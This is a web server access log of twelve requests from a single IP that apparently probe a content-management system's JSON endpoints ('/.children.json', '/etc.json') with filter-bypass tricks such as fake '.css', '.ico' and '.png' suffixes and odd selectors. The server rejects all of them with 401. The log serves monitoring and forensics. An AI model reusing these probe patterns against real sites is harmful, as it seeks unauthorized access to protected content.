137.74.150.112 - - [12/Aug/2021:16:37:07 +0200] "GET /.children....4.2.1....json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:08 +0200] "GET /.children.json?FNZ.css HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:08 +0200] "GET /.children.json?FNZ.ico HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:08 +0200] "GET /.children.json?FNZ.html HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:09 +0200] "GET /.children.json/FNZ.css HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:09 +0200] "GET /.children.json/FNZ.html HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:10 +0200] "GET /.children.json/FNZ.png HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:10 +0200] "GET /.children.json/FNZ.ico HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:11 +0200] "GET /etc.json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:11 +0200] "GET /etc.1.json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:12 +0200] "GET /etc....4.2.1....json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:12 +0200] "GET /etc.json?FNZ.css HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
